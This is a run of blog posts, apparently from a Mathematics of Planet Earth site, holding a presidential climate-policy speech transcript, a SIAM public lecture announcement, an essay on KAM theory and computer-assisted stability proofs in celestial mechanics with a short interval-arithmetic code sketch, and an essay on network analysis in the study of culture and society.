    And we know that the costs of these events can be measured in lost lives and lost livelihoods, lost homes, lost businesses, hundreds of billions of dollars in emergency services and disaster relief. In fact, those who are already feeling the effects of climate change don’t have time to deny it — they’re busy dealing with it. Firefighters are braving longer wildfire seasons, and states and federal governments have to figure out how to budget for that. I had to sit on a meeting with the Department of Interior and Agriculture and some of the rest of my team just to figure out how we’re going to pay for more and more expensive fire seasons.

    Farmers see crops wilted one year, washed away the next; and the higher food prices get passed on to you, the American consumer. Mountain communities worry about what smaller snowpacks will mean for tourism — and then, families at the bottom of the mountains wonder what it will mean for their drinking water. Americans across the country are already paying the price of inaction in insurance premiums, state and local taxes, and the costs of rebuilding and disaster relief.

    So the question is not whether we need to act. The overwhelming judgment of science — of chemistry and physics and millions of measurements — has put all that to rest. Ninety-seven percent of scientists, including, by the way, some who originally disputed the data, have now put that to rest. They’ve acknowledged the planet is warming and human activity is contributing to it.

    So the question now is whether we will have the courage to act before it’s too late. And how we answer will have a profound impact on the world that we leave behind not just to you, but to your children and to your grandchildren.

    As a President, as a father, and as an American, I’m here to say we need to act. (Applause.)

    I refuse to condemn your generation and future generations to a planet that’s beyond fixing. And that’s why, today, I’m announcing a new national climate action plan, and I’m here to enlist your generation’s help in keeping the United States of America a leader — a global leader — in the fight against climate change.

    This plan builds on progress that we’ve already made. Last year, I took office — the year that I took office, my administration pledged to reduce America’s greenhouse gas emissions by about 17 percent from their 2005 levels by the end of this decade. And we rolled up our sleeves and we got to work. We doubled the electricity we generated from wind and the sun. We doubled the mileage our cars will get on a gallon of gas by the middle of the next decade. (Applause.)

    Here at Georgetown, I unveiled my strategy for a secure energy future. And thanks to the ingenuity of our businesses, we’re starting to produce much more of our own energy. We’re building the first nuclear power plants in more than three decades — in Georgia and South Carolina. For the first time in 18 years, America is poised to produce more of our own oil than we buy from other nations. And today, we produce more natural gas than anybody else. So we’re producing energy. And these advances have grown our economy, they’ve created new jobs, they can’t be shipped overseas — and, by the way, they’ve also helped drive our carbon pollution to its lowest levels in nearly 20 years. Since 2006, no country on Earth has reduced its total carbon pollution by as much as the United States of America. (Applause.)

    So it’s a good start. But the reason we’re all here in the heat today is because we know we’ve got more to do.

    In my State of the Union address, I urged Congress to come up with a bipartisan, market-based solution to climate change, like the one that Republican and Democratic senators worked on together a few years ago. And I still want to see that happen. I’m willing to work with anyone to make that happen.

    But this is a challenge that does not pause for partisan gridlock. It demands our attention now. And this is my plan to meet it — a plan to cut carbon pollution; a plan to protect our country from the impacts of climate change; and a plan to lead the world in a coordinated assault on a changing climate. (Applause.)

    This plan begins with cutting carbon pollution by changing the way we use energy — using less dirty energy, using more clean energy, wasting less energy throughout our economy.

    Forty-three years ago, Congress passed a law called the Clean Air Act of 1970. (Applause.) It was a good law. The reasoning behind it was simple: New technology can protect our health by protecting the air we breathe from harmful pollution. And that law passed the Senate unanimously. Think about that — it passed the Senate unanimously. It passed the House of Representatives 375 to 1. I don’t know who the one guy was — I haven’t looked that up. (Laughter.) You can barely get that many votes to name a post office these days. (Laughter.)

    It was signed into law by a Republican President. It was later strengthened by another Republican President. This used to be a bipartisan issue.

    Six years ago, the Supreme Court ruled that greenhouse gases are pollutants covered by that same Clean Air Act. (Applause.) And they required the Environmental Protection Agency, the EPA, to determine whether they’re a threat to our health and welfare. In 2009, the EPA determined that they are a threat to both our health and our welfare in many different ways — from dirtier air to more common heat waves — and, therefore, subject to regulation.

    Today, about 40 percent of America’s carbon pollution comes from our power plants. But here’s the thing: Right now, there are no federal limits to the amount of carbon pollution that those plants can pump into our air. None. Zero. We limit the amount of toxic chemicals like mercury and sulfur and arsenic in our air or our water, but power plants can still dump unlimited amounts of carbon pollution into the air for free. That’s not right, that’s not safe, and it needs to stop. (Applause.)

    So today, for the sake of our children, and the health and safety of all Americans, I’m directing the Environmental Protection Agency to put an end to the limitless dumping of carbon pollution from our power plants, and complete new pollution standards for both new and existing power plants. (Applause.)

    I’m also directing the EPA to develop these standards in an open and transparent way, to provide flexibility to different states with different needs, and build on the leadership that many states, and cities, and companies have already shown. In fact, many power companies have already begun modernizing their plants, and creating new jobs in the process. Others have shifted to burning cleaner natural gas instead of dirtier fuel sources.

    Nearly a dozen states have already implemented or are implementing their own market-based programs to reduce carbon pollution. More than 25 have set energy efficiency targets. More than 35 have set renewable energy targets. Over 1,000 mayors have signed agreements to cut carbon pollution. So the idea of setting higher pollution standards for our power plants is not new. It’s just time for Washington to catch up with the rest of the country. And that’s what we intend to do. (Applause.)

    Now, what you’ll hear from the special interests and their allies in Congress is that this will kill jobs and crush the economy, and basically end American free enterprise as we know it. And the reason I know you’ll hear those things is because that’s what they said every time America sets clear rules and better standards for our air and our water and our children’s health. And every time, they’ve been wrong.

    For example, in 1970, when we decided through the Clean Air Act to do something about the smog that was choking our cities — and, by the way, most young people here aren’t old enough to remember what it was like, but when I was going to school in 1979-1980 in Los Angeles, there were days where folks couldn’t go outside. And the sunsets were spectacular because of all the pollution in the air.

    But at the time when we passed the Clean Air Act to try to get rid of some of this smog, some of the same doomsayers were saying new pollution standards will decimate the auto industry. Guess what — it didn’t happen. Our air got cleaner.

    In 1990, when we decided to do something about acid rain, they said our electricity bills would go up, the lights would go off, businesses around the country would suffer — I quote — “a quiet death.” None of it happened, except we cut acid rain dramatically.

    See, the problem with all these tired excuses for inaction is that it suggests a fundamental lack of faith in American business and American ingenuity. (Applause.) These critics seem to think that when we ask our businesses to innovate and reduce pollution and lead, they can’t or they won’t do it. They’ll just kind of give up and quit. But in America, we know that’s not true. Look at our history.

    When we restricted cancer-causing chemicals in plastics and leaded fuel in our cars, it didn’t end the plastics industry or the oil industry. American chemists came up with better substitutes. When we phased out CFCs — the gases that were depleting the ozone layer — it didn’t kill off refrigerators or air-conditioners or deodorant. (Laughter.) American workers and businesses figured out how to do it better without harming the environment as much.

    The fuel standards that we put in place just a few years ago didn’t cripple automakers. The American auto industry retooled, and today, our automakers are selling the best cars in the world at a faster rate than they have in five years — with more hybrid, more plug-in, more fuel-efficient cars for everybody to choose from. (Applause.)

    So the point is, if you look at our history, don’t bet against American industry. Don’t bet against American workers. Don’t tell folks that we have to choose between the health of our children or the health of our economy. (Applause.)

    The old rules may say we can’t protect our environment and promote economic growth at the same time, but in America, we’ve always used new technologies — we’ve used science; we’ve used research and development and discovery to make the old rules obsolete.

    Today, we use more clean energy –- more renewables and natural gas -– which is supporting hundreds of thousands of good jobs. We waste less energy, which saves you money at the pump and in your pocketbooks. And guess what — our economy is 60 percent bigger than it was 20 years ago, while our carbon emissions are roughly back to where they were 20 years ago.

    So, obviously, we can figure this out. It’s not an either/or; it’s a both/and. We’ve got to look after our children; we have to look after our future; and we have to grow the economy and create jobs. We can do all of that as long as we don’t fear the future; instead we seize it. (Applause.)

    And, by the way, don’t take my word for it — recently, more than 500 businesses, including giants like GM and Nike, issued a Climate Declaration, calling action on climate change “one of the great economic opportunities of the 21st century.” Walmart is working to cut its carbon pollution by 20 percent and transition completely to renewable energy. (Applause.) Walmart deserves a cheer for that. (Applause.) But think about it. Would the biggest company, the biggest retailer in America — would they really do that if it weren’t good for business, if it weren’t good for their shareholders?

    A low-carbon, clean energy economy can be an engine of growth for decades to come. And I want America to build that engine. I want America to build that future — right here in the United States of America. That’s our task. (Applause.)

    Now, one thing I want to make sure everybody understands — this does not mean that we’re going to suddenly stop producing fossil fuels. Our economy wouldn’t run very well if it did. And transitioning to a clean energy economy takes time. But when the doomsayers trot out the old warnings that these ambitions will somehow hurt our energy supply, just remind them that America produced more oil than we have in 15 years. What is true is that we can’t just drill our way out of the energy and climate challenge that we face. (Applause.) That’s not possible.

    I put forward in the past an all-of-the-above energy strategy, but our energy strategy must be about more than just producing more oil. And, by the way, it’s certainly got to be about more than just building one pipeline. (Applause.)

    Now, I know there’s been, for example, a lot of controversy surrounding the proposal to build a pipeline, the Keystone pipeline, that would carry oil from Canadian tar sands down to refineries in the Gulf. And the State Department is going through the final stages of evaluating the proposal. That’s how it’s always been done. But I do want to be clear: Allowing the Keystone pipeline to be built requires a finding that doing so would be in our nation’s interest. And our national interest will be served only if this project does not significantly exacerbate the problem of carbon pollution. (Applause.) The net effects of the pipeline’s impact on our climate will be absolutely critical to determining whether this project is allowed to go forward. It’s relevant.

    Now, even as we’re producing more domestic oil, we’re also producing more cleaner-burning natural gas than any other country on Earth. And, again, sometimes there are disputes about natural gas, but let me say this: We should strengthen our position as the top natural gas producer because, in the medium term at least, it not only can provide safe, cheap power, but it can also help reduce our carbon emissions.

    Federally supported technology has helped our businesses drill more effectively and extract more gas. And now, we’ll keep working with the industry to make drilling safer and cleaner, to make sure that we’re not seeing methane emissions, and to put people to work modernizing our natural gas infrastructure so that we can power more homes and businesses with cleaner energy.

    The bottom line is natural gas is creating jobs. It’s lowering many families’ heat and power bills. And it’s the transition fuel that can power our economy with less carbon pollution even as our businesses work to develop and then deploy more of the technology required for the even cleaner energy economy of the future.

    And that brings me to the second way that we’re going to reduce carbon pollution — by using more clean energy. Over the past four years, we’ve doubled the electricity that we generate from zero-carbon wind and solar power. (Applause.) And that means jobs — jobs manufacturing the wind turbines that now generate enough electricity to power nearly 15 million homes; jobs installing the solar panels that now generate more than four times the power at less cost than just a few years ago.

    I know some Republicans in Washington dismiss these jobs, but those who do need to call home — because 75 percent of all wind energy in this country is generated in Republican districts. (Laughter.) And that may explain why last year, Republican governors in Kansas and Oklahoma and Iowa — Iowa, by the way, a state that harnesses almost 25 percent of its electricity from the wind — helped us in the fight to extend tax credits for wind energy manufacturers and producers. (Applause.) Tens of thousands good jobs were on the line, and those jobs were worth the fight.

    And countries like China and Germany are going all in in the race for clean energy. I believe Americans build things better than anybody else. I want America to win that race, but we can’t win it if we’re not in it. (Applause.)

    So the plan I’m announcing today will help us double again our energy from wind and sun. Today, I’m directing the Interior Department to green light enough private, renewable energy capacity on public lands to power more than 6 million homes by 2020. (Applause.)

    The Department of Defense — the biggest energy consumer in America — will install 3 gigawatts of renewable power on its bases, generating about the same amount of electricity each year as you’d get from burning 3 million tons of coal. (Applause.)

    And because billions of your tax dollars continue to still subsidize some of the most profitable corporations in the history of the world, my budget once again calls for Congress to end the tax breaks for big oil companies, and invest in the clean-energy companies that will fuel our future. (Applause.)

    Now, the third way to reduce carbon pollution is to waste less energy — in our cars, our homes, our businesses. The fuel standards we set over the past few years mean that by the middle of the next decade, the cars and trucks we buy will go twice as far on a gallon of gas. That means you’ll have to fill up half as often; we’ll all reduce carbon pollution. And we built on that success by setting the first-ever standards for heavy-duty trucks and buses and vans. And in the coming months, we’ll partner with truck makers to do it again for the next generation of vehicles.

    Meanwhile, the energy we use in our homes and our businesses and our factories, our schools, our hospitals — that’s responsible for about one-third of our greenhouse gases. The good news is simple upgrades don’t just cut that pollution; they put people to work — manufacturing and installing smarter lights and windows and sensors and appliances. And the savings show up in our electricity bills every month — forever. That’s why we’ve set new energy standards for appliances like refrigerators and dishwashers. And today, our businesses are building better ones that will also cut carbon pollution and cut consumers’ electricity bills by hundreds of billions of dollars.

    That means, by the way, that our federal government also has to lead by example. I’m proud that federal agencies have reduced their greenhouse gas emissions by more than 15 percent since I took office. But we can do even better than that. So today, I’m setting a new goal: Your federal government will consume 20 percent of its electricity from renewable sources within the next seven years. We are going to set that goal. (Applause.)

    We’ll also encourage private capital to get off the sidelines and get into these energy-saving investments. And by the end of the next decade, these combined efficiency standards for appliances and federal buildings will reduce carbon pollution by at least three billion tons. That’s an amount equal to what our entire energy sector emits in nearly half a year.

    So I know these standards don’t sound all that sexy, but think of it this way: That’s the equivalent of planting 7.6 billion trees and letting them grow for 10 years — all while doing the dishes. It is a great deal and we need to be doing it. (Applause.)

    So using less dirty energy, transitioning to cleaner sources of energy, wasting less energy through our economy is where we need to go. And this plan will get us there faster. But I want to be honest — this will not get us there overnight. The hard truth is carbon pollution has built up in our atmosphere for decades now. And even if we Americans do our part, the planet will slowly keep warming for some time to come. The seas will slowly keep rising and storms will get more severe, based on the science. It’s like tapping the brakes of a car before you come to a complete stop and then can shift into reverse. It’s going to take time for carbon emissions to stabilize.

    So in the meantime, we’re going to need to get prepared. And that’s why this plan will also protect critical sectors of our economy and prepare the United States for the impacts of climate change that we cannot avoid. States and cities across the country are already taking it upon themselves to get ready. Miami Beach is hardening its water supply against seeping saltwater. We’re partnering with the state of Florida to restore Florida’s natural clean water delivery system — the Everglades.

    The overwhelmingly Republican legislature in Texas voted to spend money on a new water development bank as a long-running drought cost jobs and forced a town to truck in water from the outside.

    New York City is fortifying its 520 miles of coastline as an insurance policy against more frequent and costly storms. And what we’ve learned from Hurricane Sandy and other disasters is that we’ve got to build smarter, more resilient infrastructure that can protect our homes and businesses, and withstand more powerful storms. That means stronger seawalls, natural barriers, hardened power grids, hardened water systems, hardened fuel supplies.

    So the budget I sent Congress includes funding to support communities that build these projects, and this plan directs federal agencies to make sure that any new project funded with taxpayer dollars is built to withstand increased flood risks.

    And we’ll partner with communities seeking help to prepare for droughts and floods, reduce the risk of wildfires, protect the dunes and wetlands that pull double duty as green space and as natural storm barriers. And we’ll also open our climate data and NASA climate imagery to the public, to make sure that cities and states assess risk under different climate scenarios, so that we don’t waste money building structures that don’t withstand the next storm.

    So that’s what my administration will do to support the work already underway across America, not only to cut carbon pollution, but also to protect ourselves from climate change. But as I think everybody here understands, no nation can solve this challenge alone — not even one as powerful as ours. And that’s why the final part of our plan calls on America to lead — lead international efforts to combat a changing climate. (Applause.)

    And make no mistake — the world still looks to America to lead. When I spoke to young people in Turkey a few years ago, the first question I got wasn’t about the challenges that part of the world faces. It was about the climate challenge that we all face, and America’s role in addressing it. And it was a fair question, because as the world’s largest economy and second-largest carbon emitter, as a country with unsurpassed ability to drive innovation and scientific breakthroughs, as the country that people around the world continue to look to in times of crisis, we’ve got a vital role to play. We can’t stand on the sidelines. We’ve got a unique responsibility. And the steps that I’ve outlined today prove that we’re willing to meet that responsibility.

    Though all America’s carbon pollution fell last year, global carbon pollution rose to a record high. That’s a problem. Developing countries are using more and more energy, and tens of millions of people entering a global middle class naturally want to buy cars and air-conditioners of their own, just like us. Can’t blame them for that. And when you have conversations with poor countries, they’ll say, well, you went through these stages of development — why can’t we?

    But what we also have to recognize is these same countries are also more vulnerable to the effects of climate change than we are. They don’t just have as much to lose, they probably have more to lose.

    Developing nations with some of the fastest-rising levels of carbon pollution are going to have to take action to meet this challenge alongside us. They’re watching what we do, but we’ve got to make sure that they’re stepping up to the plate as well. We compete for business with them, but we also share a planet. And we have to all shoulder the responsibility for keeping the planet habitable, or we’re going to suffer the consequences — together.

    So to help more countries transitioning to cleaner sources of energy and to help them do it faster, we’re going to partner with our private sector to apply private sector technological know-how in countries that transition to natural gas. We’ve mobilized billions of dollars in private capital for clean energy projects around the world.

    Today, I’m calling for an end of public financing for new coal plants overseas — (applause) — unless they deploy carbon-capture technologies, or there’s no other viable way for the poorest countries to generate electricity. And I urge other countries to join this effort.

    And I’m directing my administration to launch negotiations toward global free trade in environmental goods and services, including clean energy technology, to help more countries skip past the dirty phase of development and join a global low-carbon economy. They don’t have to repeat all the same mistakes that we made. (Applause.)

    We’ve also intensified our climate cooperation with major emerging economies like India and Brazil, and China — the world’s largest emitter. So, for example, earlier this month, President Xi of China and I reached an important agreement to jointly phase down our production and consumption of dangerous hydrofluorocarbons, and we intend to take more steps together in the months to come. It will make a difference. It’s a significant step in the reduction of carbon emissions. (Applause.)

    And finally, my administration will redouble our efforts to engage our international partners in reaching a new global agreement to reduce carbon pollution through concrete action. (Applause.)

    Four years ago, in Copenhagen, every major country agreed, for the first time, to limit carbon pollution by 2020. Two years ago, we decided to forge a new agreement beyond 2020 that would apply to all countries, not just developed countries.

    What we need is an agreement that’s ambitious — because that’s what the scale of the challenge demands. We need an inclusive agreement -– because every country has to play its part. And we need an agreement that’s flexible — because different nations have different needs. And if we can come together and get this right, we can define a sustainable future for your generation.

    So that’s my plan. (Applause.) The actions I’ve announced today should send a strong signal to the world that America intends to take bold action to reduce carbon pollution. We will continue to lead by the power of our example, because that’s what the United States of America has always done.

    I am convinced this is the fight America can, and will, lead in the 21st century. And I’m convinced this is a fight that America must lead. But it will require all of us to do our part. We’ll need scientists to design new fuels, and we’ll need farmers to grow new fuels. We’ll need engineers to devise new technologies, and we’ll need businesses to make and sell those technologies. We’ll need workers to operate assembly lines that hum with high-tech, zero-carbon components, but we’ll also need builders to hammer into place the foundations for a new clean energy era.

    We’re going to need to give special care to people and communities that are unsettled by this transition — not just here in the United States but around the world. And those of us in positions of responsibility, we’ll need to be less concerned with the judgment of special interests and well-connected donors, and more concerned with the judgment of posterity. (Applause.) Because you and your children, and your children’s children, will have to live with the consequences of our decisions.

    As I said before, climate change has become a partisan issue, but it hasn’t always been. It wasn’t that long ago that Republicans led the way on new and innovative policies to tackle these issues. Richard Nixon opened the EPA. George H.W. Bush declared — first U.S. President to declare — “human activities are changing the atmosphere in unexpected and unprecedented ways.” Someone who never shies away from a challenge, John McCain, introduced a market-based cap-and-trade bill to slow carbon pollution.

    The woman that I’ve chosen to head up the EPA, Gina McCarthy, she’s worked — (applause) — she’s terrific. Gina has worked for the EPA in my administration, but she’s also worked for five Republican governors. She’s got a long track record of working with industry and business leaders to forge common-sense solutions. Unfortunately, she’s being held up in the Senate. She’s been held up for months, forced to jump through hoops no Cabinet nominee should ever have to –- not because she lacks qualifications, but because there are too many in the Republican Party right now who think that the Environmental Protection Agency has no business protecting our environment from carbon pollution. The Senate should confirm her without any further obstruction or delay. (Applause.)

    But more broadly, we’ve got to move beyond partisan politics on this issue. I want to be clear — I am willing to work with anybody –- Republicans, Democrats, independents, libertarians, greens -– anybody — to combat this threat on behalf of our kids. I am open to all sorts of new ideas, maybe better ideas, to make sure that we deal with climate change in a way that promotes jobs and growth.

    Nobody has a monopoly on what is a very hard problem, but I don’t have much patience for anyone who denies that this challenge is real. (Applause.) We don’t have time for a meeting of the Flat Earth Society. (Applause.) Sticking your head in the sand might make you feel safer, but it’s not going to protect you from the coming storm. And ultimately, we will be judged as a people, and as a society, and as a country on where we go from here.

    Our founders believed that those of us in positions of power are elected not just to serve as custodians of the present, but as caretakers of the future. And they charged us to make decisions with an eye on a longer horizon than the arc of our own political careers. That’s what the American people expect. That’s what they deserve.

    And someday, our children, and our children’s children, will look at us in the eye and they’ll ask us, did we do all that we could when we had the chance to deal with this problem and leave them a cleaner, safer, more stable world? And I want to be able to say, yes, we did. Don’t you want that? (Applause.)

    Americans are not a people who look backwards; we’re a people who look forward. We’re not a people who fear what the future holds; we shape it. What we need in this fight are citizens who will stand up, and speak up, and compel us to do what this moment demands.

    Understand this is not just a job for politicians. So I’m going to need all of you to educate your classmates, your colleagues, your parents, your friends. Tell them what’s at stake. Speak up at town halls, church groups, PTA meetings. Push back on misinformation. Speak up for the facts. Broaden the circle of those who are willing to stand up for our future. (Applause.)

    Convince those in power to reduce our carbon pollution. Push your own communities to adopt smarter practices. Invest. Divest. (Applause.) Remind folks there’s no contradiction between a sound environment and strong economic growth. And remind everyone who represents you at every level of government that sheltering future generations against the ravages of climate change is a prerequisite for your vote. Make yourself heard on this issue. (Applause.)

    I understand the politics will be tough. The challenge we must accept will not reward us with a clear moment of victory. There’s no gathering army to defeat. There’s no peace treaty to sign. When President Kennedy said we’d go to the moon within the decade, we knew we’d build a spaceship and we’d meet the goal. Our progress here will be measured differently — in crises averted, in a planet preserved. But can we imagine a more worthy goal? For while we may not live to see the full realization of our ambition, we will have the satisfaction of knowing that the world we leave to our children will be better off for what we did.

    “It makes you realize,” that astronaut said all those years ago, “just what you have back there on Earth.” And that image in the photograph, that bright blue ball rising over the moon’s surface, containing everything we hold dear — the laughter of children, a quiet sunset, all the hopes and dreams of posterity — that’s what’s at stake. That’s what we’re fighting for. And if we remember that, I’m absolutely sure we’ll succeed.

    Thank you. God bless you. God bless the United States of America. (Applause.)

    END 2:32 P.M. EDT

    Posted in Climate Change, Public Event | Leave a comment

    SIAM Annual Meeting – I.E. Block Community Lecture

MPE2013 features a wealth of public lectures to highlight the year of Mathematics of Planet Earth. There is also a public lecture (the I.E. Block Community Lecture) associated with the SIAM Annual Meeting, and the topic of the lecture this year follows an MPE theme. The lecture will be delivered by Anette Hosoi of MIT, with the title From Razor Clams to Robots: The Mathematics Behind Biologically Inspired Design. The talk promises to look at natural biological systems for insights into the design and control of unconventional robotic systems, with crawling snails, digging clams, and swimming micro-organisms as examples. Mathematics enables the analysis of the physical principles exploited by clams and snails and may provide insights into the design of robotic systems. This lecture is intended for a general audience.

    When: Wednesday, July 10, 6:15 p.m.
Where: San Diego, California; Town and Country Resort and Convention Center; Town & Country Room.

    The general public is invited to attend.

    Posted in Biology, Mathematics, Public Event | Leave a comment

    KAM Theory and Celestial Mechanics

Is the Earth’s orbit stable? Will the Moon always point the same face to our planet? Will some asteroid collide with the Earth? These questions have puzzled mankind since antiquity, and answers have been sought over the centuries, even though these events might occur on time scales much longer than a human lifetime. It is indeed extremely difficult to settle these questions, and despite all efforts, scientists have been unable to give definite answers. But the advent of computers and the development of outstanding mathematical theories now enable us to obtain some results on the stability of the solar system, at least for simple model problems.

    The stability of the solar system is a very difficult mathematical problem, which has been investigated in the past by celebrated mathematicians, including Lagrange, Laplace and Poincaré. Their investigations led to the development of perturbation theories—theories to find approximate solutions of the equations of motion. However, such theories have an intrinsic difficulty related to the appearance of the so-called small divisors—quantities that can prevent the convergence of the series defining the solution.

    A breakthrough occurred in the middle of the 20th century. At the 1954 International Congress of Mathematicians in Amsterdam, the Russian mathematician Andrei N. Kolmogorov (1903-1987) gave the closing lecture, entitled “The general theory of dynamical systems and classical mechanics.” The lecture concerned the stability of specific motions (for the experts: the persistence of quasi-periodic motions under small perturbations of an integrable system). A few years later, Vladimir I. Arnold (1937-2010), using a different approach, generalized Kolmogorov’s results to (Hamiltonian) systems presenting some degeneracies, and in 1962 Jürgen Moser (1928-1999) covered the case of finitely differentiable systems. The overall result is known as KAM theory, from the initials of the three authors [K], [A], [M]. KAM theory can be developed under quite general assumptions.

    An application to the N-body problem in Celestial Mechanics was given by Arnold, who proved the existence of some stable solutions when the orbits are nearly circular and coplanar. Quantitative estimates for a three-body model (e.g., the Sun, Jupiter and an asteroid) were given in 1966 by the French mathematician and astronomer M. Hénon (1931-2013), based on the original versions of KAM theory [H]. However, his results were a long way from reality; in the best case they proved the stability of some orbits when the primary mass-ratio is of the order of $10^{-48}$—a value that is inconsistent with the astronomical Jupiter-Sun mass-ratio, which is of the order of $10^{-3}$. For this reason Hénon concluded in one of his papers, “Ainsi, ces théorèmes, bien que d’un très grand intérêt théorique, ne semblent pas pouvoir en leur état actuel être appliqués à des problèmes pratiques” [H]. This result led to the general belief that, although an extremely powerful mathematical method, KAM theory does not have concrete applications, since the perturbing body must be unrealistically small.

    During one of my stays at the Observatory of Nice in France, I had the privilege to meet Michel Hénon. In the course of one of our discussions he showed me his computations on KAM theory, which were done by hand on only two pages. It was indeed a success that such a complicated theory could be applied using just two pages! But it was also evident that, to get better results, much longer computations would be necessary, as often happens in classical perturbation theory.

    A new challenge came when mathematicians started to develop computer-assisted proofs. With this technique, which has been widely used in several fields of mathematics, one proves mathematical theorems with the aid of a computer. Indeed, it is possible to keep track of rounding and propagation errors through a technique called interval arithmetic. The synergy between theory and computers turns out to be really effective: the machine enables us to perform a huge number of computations, and the errors are controlled through interval arithmetic. Thus, the validity of the mathematical proof is maintained. The idea was then to combine KAM theory and interval arithmetic. As we will see shortly, the new strategy yields results for simple model problems that agree with the physical measurements. Thus, computer-assisted proofs combine the rigour of the mathematical computations with the concreteness of astronomical observations.
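    As a toy illustration of the bookkeeping behind such proofs, here is a minimal interval-arithmetic sketch in Python. It is not the machinery used in the works cited below (those rely on compiled code and hardware directed rounding); the crude outward “inflation” by EPS merely mimics rigorous outward rounding for the purpose of illustration.

        EPS = 1e-15  # crude stand-in for one unit of outward rounding (illustration only)

        class Interval:
            """An interval [lo, hi] intended to enclose the true value of a quantity."""
            def __init__(self, lo, hi=None):
                self.lo, self.hi = lo, (lo if hi is None else hi)

            def __add__(self, other):
                return Interval(self.lo + other.lo - EPS, self.hi + other.hi + EPS)

            def __mul__(self, other):
                p = [self.lo * other.lo, self.lo * other.hi,
                     self.hi * other.lo, self.hi * other.hi]
                return Interval(min(p) - EPS, max(p) + EPS)

            def __repr__(self):
                return f"[{self.lo:.17g}, {self.hi:.17g}]"

        # Enclose (1/3 + 1/7) * 21, whose exact value is 10: the printed interval
        # contains 10, however the rounding errors happened to fall.
        third = Interval(0.3333333333333333, 0.3333333333333334)
        seventh = Interval(0.14285714285714285, 0.14285714285714288)
        print((third + seventh) * Interval(21.0))

    In a genuine computer-assisted proof, every constant appearing in the KAM estimates is propagated through intervals of this kind, so the final inequality holds despite floating-point rounding.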
    Here are three applications of KAM theory in Celestial Mechanics which yield realistic estimates. The extension to more complex models is often limited by available computing power.

    • A three-body problem for the Sun, Jupiter and the asteroid Victoria was investigated in [CC]. Careful analytical estimates were combined with a Fortran code implementing long computations using interval arithmetic. The results show that in such a model the motion of the asteroid Victoria is stable for the realistic Jupiter-Sun mass-ratio.
    • In the framework of planetary problems, the Sun-Jupiter-Saturn system was studied in [LG]. A bound was obtained on the secular motion of the planets for the observed values of the parameters. (The proof is based on the algebraic manipulation of series, analytic estimates and interval arithmetic.)
    • A third application concerns the rotational motion of the Moon in the so-called spin-orbit resonance, which is responsible for the well-known fact that the Moon always points the same face to the Earth. Here, a computer-assisted KAM proof yielded the stability of the Moon in the actual state for the true values of the parameters [C].

    Although it is clear that these models provide an (often crude) approximation of reality, they were analyzed through a rigorous method to establish the stability of objects in the solar system. The incredible effort by Kolmogorov, Arnold and Moser is starting to yield new results for concrete applications. Faster computational tools, combined with refined KAM estimates, will probably enable us to obtain good results also for more realistic models. Proving a theorem for the stability of the Earth or the motion of the Moon will definitely let us sleep more soundly!

    References:

    [A] V.I. Arnold, “Proof of a Theorem by A.N. Kolmogorov on the invariance of quasi–periodic motions under small perturbations of the Hamiltonian,” Russ. Math. Surveys, vol. 18, 13-40 (1963).
    [C] A. Celletti, “Analysis of Resonances in the Spin-Orbit Problem in Celestial Mechanics,” PhD thesis, ETH-Zürich (1989); see also “Analysis of resonances in the spin-orbit problem in Celestial Mechanics: the synchronous resonance (Part I),” Journal of Applied Mathematics and Physics (ZAMP), vol. 41, 174-204 (1990).
    [CC] A. Celletti and L. Chierchia, “KAM Stability and Celestial Mechanics,” Memoirs American Mathematical Society, vol. 187, no. 878 (2007).
    [LG] U. Locatelli and A. Giorgilli, “Invariant Tori in the Secular Motions of the Three-Body Planetary Systems,” Celestial Mechanics and Dynamical Astronomy, vol. 78, 47-74 (2000).
    [H] M. Hénon, “Exploration numérique du problème restreint IV: Masses égales, orbites non périodiques,” Bulletin Astronomique, vol. 3, 1, fasc. 2, 49-66 (1966).
    [K] A.N. Kolmogorov, “On the conservation of conditionally periodic motions under small perturbation of the Hamiltonian,” Dokl. Akad. Nauk SSSR, vol. 98, 527-530 (1954).
    [M] J. Moser, “On invariant curves of area-preserving mappings of an annulus,” Nachr. Akad. Wiss. Göttingen, Math. Phys. Kl. II, vol. 1, 1-20 (1962).

    Alessandra Celletti
    Dipartimento di Matematica
    Università di Roma Tor Vergata
    Italy

    Posted in Astrophysics, Mathematics | Leave a comment

    Networks in the Study of Culture and Society

    The use of computational methods to explore complex social and cultural phenomena is growing ever more common. Geographic information science is being used to better understand the shape and scale of the Holocaust [1], natural language processing techniques are being leveraged to detect the style and genre of 19th-century literature, and information visualization is being used to present and interrogate both of these subjects. Among these techniques, the study of networks and how they grow may be the most interesting.

    Modern mathematical network analysis techniques have been around for decades, whether developed to identify centrality in social networks or to distort topography to reflect topology in transportation networks, as in the work of geographer Waldo Tobler. But the growing accessibility of tools and software libraries to build, curate, and analyze networks, along with the growing prominence of such networks in our everyday lives, has led to a wealth of applications in digital humanities and computational social sciences.

    When we use networks to study culture and society, we perform an important shift in perspective away from the demographic and biographical to a focus on relationships. The study of networks is the study of the ties that bind people and places and objects, and the exhaustive details of those places and people, which are so important to traditional scholarship, are less important when they are viewed in a network. It is the strength and character of the bonds that define an actor’s place in a network, not the list of accomplishments that actor may have, though one would expect some correlation. In changing our perspective like this, we discover the nature of the larger system, and gain the ability to identify overlooked individuals and places that may have more prominence or power from a network perspective.

    Many of the networks studied by researchers are social networks, with historical networks being the most difficult to approximate and comprehend, because they pose hard problems of modeling and representation. In the 16th century, Spanish scientists reported their geographic locations and subjects of study, but some gamed the system, falsely claiming connections to more prominent scientists or activity in fields they never pursued. The China Biographical Database [2] has nearly 120,000 entries for Chinese civil servants, their kinship ties, their offices and postings, and the events in their lives, but only half have known affiliations. In the case of historical networks, the unevenness of the data may not be systematic, and it might even be the result of intentional misrepresentation.

    Other networks are not social networks per se. In “ORBIS: The Stanford Geospatial Network Model of the Roman World” [3, 4], the goal was to build a parsimonious transportation network model of the Roman World with which to compile and better understand movement of people and goods in that period and region. To do so required not only the tracing of Roman roads using GIS, but the simulation of sailing to generate coastal and sea routes to fill out the network. The result of such a model is to provide the capacity to plan a trip from Constantinople to Londinium in March and see the cost according to Diocletian’s Edict and the time according to a schematic speed for the vehicle selected. But more than that, the ORBIS network model is an argument about the shape and nature of the Roman World, and embedded in it are claims such as that the distance of England from the rest of Rome was variable, and that changing the capital—moving the center of the network—would have systematic effects on the nature of political control.

    Networks are inherently models that involve explicit, formal representation of the connection between individual elements in a system. But the accessibility of tools to represent and analyze such models has outstripped the familiarity with the methods for doing so. You can now calculate the Eigenvector Centrality of your network with the push of a button, but understanding what Eigenvector Centrality is still takes time and effort. More complex techniques for understanding the nature of networks, like the Exponential Random Graph Models being studied at the AIM workshop this week, require even more investment to understand and deploy. But the results of the use of computational methods in the exploration of history and culture are worth that investment.
